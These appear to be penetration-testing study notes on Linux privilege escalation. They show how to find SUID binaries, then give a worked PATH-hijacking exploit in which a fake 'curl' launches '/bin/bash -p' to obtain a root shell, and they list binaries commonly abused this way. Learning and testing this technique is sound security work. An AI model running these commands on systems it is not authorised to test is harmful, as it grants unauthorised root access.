Path Variable Manipulation

What are SUID, SGID, and sticky bits?

Search the system for files with the SUID bit set

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Verify that a file has the SUID bit set

ls -l /usr/file/test
# Example Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/file/test

Example of exploit

We find a script with the SUID bit set that runs curl when called. Create a binary called curl that gives you a bash shell, then modify the user's PATH so that the script picks up your curl instead; running the script will then give you a root bash shell.

# Verify file has SUID bit
ls -l /usr/bin/script
# Output:
# -rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/script

# Create binary called curl
echo "/bin/bash -p" > /home/user/curl
chmod +x /home/user/curl

# Modify $PATH
echo $PATH
export PATH=/home/user:$PATH
echo $PATH

# Running exploit
/usr/bin/script

What are typical SUID files? (not cp)

Check the binary against https://gtfobins.github.io/ to find an exploitable one. You could also use LinEnum or LinPEAS to automate priv esc enumeration.

Common SUID binaries used for priv esc:

Nmap
Vim
find
Bash
More
Less
Nano
cp
